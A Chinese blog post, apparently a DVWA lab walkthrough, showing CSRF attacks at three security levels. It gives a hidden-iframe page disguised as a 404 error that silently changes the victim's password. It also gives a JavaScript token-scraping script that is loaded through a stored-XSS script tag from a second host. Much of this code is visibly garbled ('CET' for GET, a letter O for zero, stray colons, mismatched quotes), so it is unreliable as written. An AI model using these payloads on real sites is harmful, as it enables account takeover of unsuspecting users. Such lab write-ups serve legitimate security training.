CSRF注入实例-DVWA

已于 2024-01-23 10:40:05 修改
阅读量378 收藏 7
点赞数 8
分类专栏: # 其他常见漏洞类型 文章标签: csrf 前端 安全
于 2024-01-20 10:55:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62715196/article/details/135712353
版权

文章目录

DVWA

低级别

直接通过点击链接改密码
在这里插入图片描述

中级别

安全配置对 referer 做了检查
在这里插入图片描述

构造一个 HTML文件,让受害者访问

<body>
<iframe src="http://192.168.65.128/dvwa/vulnerabilities/csrf/?password_new =666.com&password_conf=666.com&Change=Change#" style="display: none"></iframe>
<h1 style="text-align: center;">404</h1>
<h3 style="text-align: center;">File not found</h3>
</body>

在这里插入图片描述

保证文件的名字和 server-name 一样

在这里插入图片描述

诱导用户访问

在这里插入图片描述

自动创建用户

高级别

安全配置做了随机 Token 检查
通过写 JS 脚本自动获取 Token 并提交 URL 修改密码

var tokenUrl ='http://192.168.65.128/dvwa/vulnerabilities/csrf/';
xmlhttp=new XMLHttpRequest():
var count = 0;
xmlhttp.onreadystatechange=function(){
if(xmlhttp.readyState == 4 && xmlhttp.status ==200){
var text=xmlhttp.responseText:
var regex =/user_token\' value\=\'(.*?)\' V\>/;
var match=text.match(regex);
var token=match[1];
var changeUrl = "http://192.168.65.128/dvwa/vulnerabilities/csrf/?user_token='+token+'&password_ new=test123&password_conf=test123&Change=Change';
if (count == O){
count =1;
xmlhttp.open("CET",changeUrl,false);
xmlhttp.send();
}}};
xmlhttp.open("CET",tokenUrl,false);
xmlhttp.send();

在 XSS 存储型低级别中添加代码

<script src="http://192.168.65.130/token.js?"+Math.random()></script>
摆烂鱼
关注
  • 8
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CSRF:ring-csrf示例
01-28
CSRF:ring-csrf示例
web安全-dvwa实战手
07-05
本文档旨在提供DVWA靶场的攻略和实践技巧,帮助用户更好地理解和应对Web应用程序漏洞,其主要分类为 1。DVWA部署暴力破解:介绍如何使用DVWA模拟暴力破解攻击,即通过尝试大量的用户名和密码组合来尝试登录系统,以测试系统的弱点和防护措施。 2。CSRF(跨站请求伪造):解释CSRF攻击是如何通过伪装用户合法请求来执行未授权的操作,以及如何在DVWA中模拟和防御此类攻击。 3。文件包含:说明文件包含漏洞是如何允许攻击者包含或执行系统中的文件,从而可能引发未授权访问或恶意代码执行的情况。 4。文件上传:介绍文件上传漏洞是如何允许攻击者上传恶意文件到目标服务器,并探讨可能导致的安全风险和防护方法。 5。SQL回显注入:说明SQL回显注入是一种允许攻击者执行恶意SQL查询的漏洞。探讨如何利用该漏洞来访问、修改或删除敏感数据。 6。XSS(跨站脚本攻击):描述XSS攻击是如何通过在Web应用程 7.命令注入:描述通过用户输入的方式将恶意命令传递给应用程序并执行的漏洞。提供如何利用该漏洞来执行系统命令,并介绍相应的防御措施。
csrf-tester-gh-pages.zip
02-23
csrf-tester-gh-pages.zip
CSRF-Protector-PHP:CSRF保护器库
05-10
CSRF保护器 CSRF保护器php,一个独立的php库,用于缓解Web应用程序中的csrf。 易于集成到任何php Web应用程序中。 使用packagist添加到您的项目 将composer.json文件添加到您的项目目录 { " require " : { " owasp/csrf-protector-php " : " dev-master " } } 然后打开终端(或命令提示符),移至项目目录并运行 composer install # # Or alternatively php composer.phar install 这会将CSRFP添加到您的项目目录中(库将在./vendor/owasp/csrf-protector-php下载)。 查看以获得有关作曲家的更多帮助! 配置 对于作曲家安装:将config.sample.php文件复制到c
Bolt:CSRF扫描仪-源码
05-25
螺栓 笨拙的CSRF扫描仪 重要的 Bolt处于测试的Beta阶段,这意味着可能存在错误。 不鼓励使用此工具。 欢迎提出请求和问题。 如果您对此仓库感兴趣,我也建议您将它放在监视中。 工作流程 爬行 Bolt将目标网站爬网到指定的深度,并将找到的所有HTML表单存储在数据库中以进行进一步处理。 评估 在此阶段,Bolt找出不够强大的令牌和不受保护的形式。 比较中 此阶段专注于重播攻击场景的检测,因此检查令牌是否已发行多次。 它还计算所有令牌之间的平均,以查看它们是否相似。 还将令牌与250多种哈希模式的数据库进行比较。 观察 在此阶段,对单个网页同时发出100个请求,以查看是否为请求生成了相同的令牌。 测验 此阶段专用于CSRF保护机制的主动测试。 它包括但不限于检查moblie浏览器是否存在保护,使用自行生成的令牌提交请求以及测试是否将令牌检查到一定长度。 分析 在此阶段执行各种统计检查
DVWACSRF漏洞
weixin_56306210的博客
03-17 1021
DVWACSRF漏洞
DVWACSRF-High跨站请求伪造高级
qq_39330735的博客
02-09 417
DVWACSRF-High跨站请求伪造高级,通过XSS漏洞联合使用的方法来实现。
web常见漏洞解析 注入 xss csrf 文件上传 文件包含 -dvwa演示
joke_ljh的博客
09-14 1297
1.注入 1.1 SQL注入: 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 手工注入:联合注入、盲注、延...
Web应用安全 -- DVWA部署(Linux、Docker版)
luckcxy的专栏
09-13 1870
一、DVWA简介 Damn Vulnerable Web Application (DVWA)(译注:可以直译为:"该死的"不安全Web应用网站),是一个编码糟糕的、易受攻击的 PHP/MySQL Web应用程序。 它的主要目的是帮助安全专业人员在合法的环境中,测试他们的技能和工具,帮助 Web 开发人员更好地了解如何增强 Web 应用程序的安全性,并帮助学生和教师在受控的课堂环境中,了解 Web 应用程序的安全。 二、场景模块简介 DVWA主要包含以下场景模块: 1.Bruce For...
DVWACSRF攻击
weixin_47726676的博客
05-16 2021
d
DVWACSRF高级
m0_73896875的博客
07-11 226
(2)再次访问CSRF页面Token值发生了变化,可以确定DVWA生成Token的机制是每次不一样/页面,然后从相应中取得Token(通过正则表达式提取)取得后在将Token和新密发一起发送给。处理方式:先切换到Low级,在留言本里注入以下脚本,然后在切换到High级,直接触发改密。(High级别无法实现)(4)先构造一个Javascript原生代码发送AJAX请求的代码。(1)访问CSRF页面,在页面的源代码中可以看到生成的Token。在high级别中,屏蔽了标签,所以无法直接利用。
DVWA下的CSRF攻防实战(详解)
一期一会的博客
04-20 4634
DVWA下的CSRF攻防实战(详解) 我们简单谈一谈CSRF与XSS的区别: CSRF (cross site request forgery)跨站请求伪造。CSRF是用户在不知情的情况下提交请求,而XSS是用户自己点击链接来访问网页。 整个攻击过程: 用户浏览并登录受信任网站A(dvwa),登录成功以后网站A会返回浏览器的信息中带有已登录的cookie,cookie信息会在浏览器端保存一定时间(根据浏览器设置而定),在用户没有退出网站A的情况下访问恶意站点B(这里在win2003制作一个危险网站),该危
DVWA--SQL注入漏洞--总结
qq_35770193的博客
05-17 971
DVWA--SQL注入漏洞--总结SQL盲注SQL手工注入四种级别的代码分析 SQL盲注 思路 判断是否存在注入注入时字符型还是数字型 基于布尔的盲注: 输入1,显示响应用户存在 输入1’ and 1=1#显示存在 输入1’ and 1=2#显示不存在,说明存在字符类型的SQL盲注 基于时间的盲注: 输入1’ and sleep(5) #,感觉到明显延迟; 输入1 and sleep(5) #,没有延迟;说明存在字符的基于时间的盲注 猜解当前数据库名 基于布尔的盲注: 输入1’ a
CSRF02】跨站请求伪造——DVWA靶场实操(含CSRF+XSS协同攻击实验)
Fighting_hawk的博客
03-15 6628
1. 掌握网页相关语言中各种标签的运用; 2. 灵活使用XSS注入代码; 3. 掌握CSRF攻击的方法; 4. 掌握XSS+CSRF协同攻击的方法。
CSRF 攻击实验:无防御措施的 CSRF 漏洞
Flag少侠的博客
05-14 1463
CSRF(Cross-Site Request Forgery),也称为XSRF,是一种安全漏洞,攻击者通过欺骗用户在受信任网站上执行非自愿的操作,以实现未经授权的请求。CSRF攻击利用了网站对用户提交的请求缺乏充分验证和防范的弱点。攻击者通常通过在受信任网站上构造恶意的请求链接或提交表单,然后诱使用户点击该链接或访问包含恶意表单的页面。当用户执行了这些操作时,网站会自动发送请求,包含用户的身份验证信息,而用户并不知情。在这个示例中,攻击者可能在自己的网站上构造一个页面,包含上述代码。
WEB转Flutter基础学习笔记(内含vue和flutter对比)
最新发布
小易不止于搬砖的博客
05-17 670
笔者是一名web前端,记录在转栈flutter时的学习笔记,内涵和vue的对比,能够辅助前端同学更容易理解flutter
vue3.0+antdv的admin管理系统vue-admin-beautiful推荐
独行猫a 的沉淀、积累、总结。天天学习,好好向上...c/c++,嵌入式 linux,Android,HarmonyOS)
05-15 1108
几年前,笔者自学了vue这一优秀的前端框架,但苦于没项目练手,无意间发现了这一优秀的前端集成框架。当时就使用它做了一很有意思的小项目---终端监控云平台,实现了前端和后台的整体功能。整体方案介绍参见博文《》,前端使用vue-admin-beautiful框架,后端使用go-zero微服务框架,几天内就搞出来了一个包含前端和后台的小项目。我的monitor-ui前端运行界面:后续有机会介绍下我这个终端监控云平台小项目的具体实现,挺有意思的。几年前还用到过几个地方的公交客户现场,客户挺喜欢这个功能的。
Unable to start ServletWebServerApplicationContext due to missing ServletWeb
s_sos0的博客
05-14 508
Unable to start ServletWebServerApplicationContext due to missing ServletWeb
复现关于dvwaCSRF-token绕过实验
05-05
CSRF-token是一种防止CSRF攻击的措施,它是一个随机生成的字符串,用于验证请求是否来自合法的来源。在DVWA中,我们可以通过修改一个cookie来绕过CSRF-token。 下面是具体的攻击步骤: 1. 打开DVWA,登录并进入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值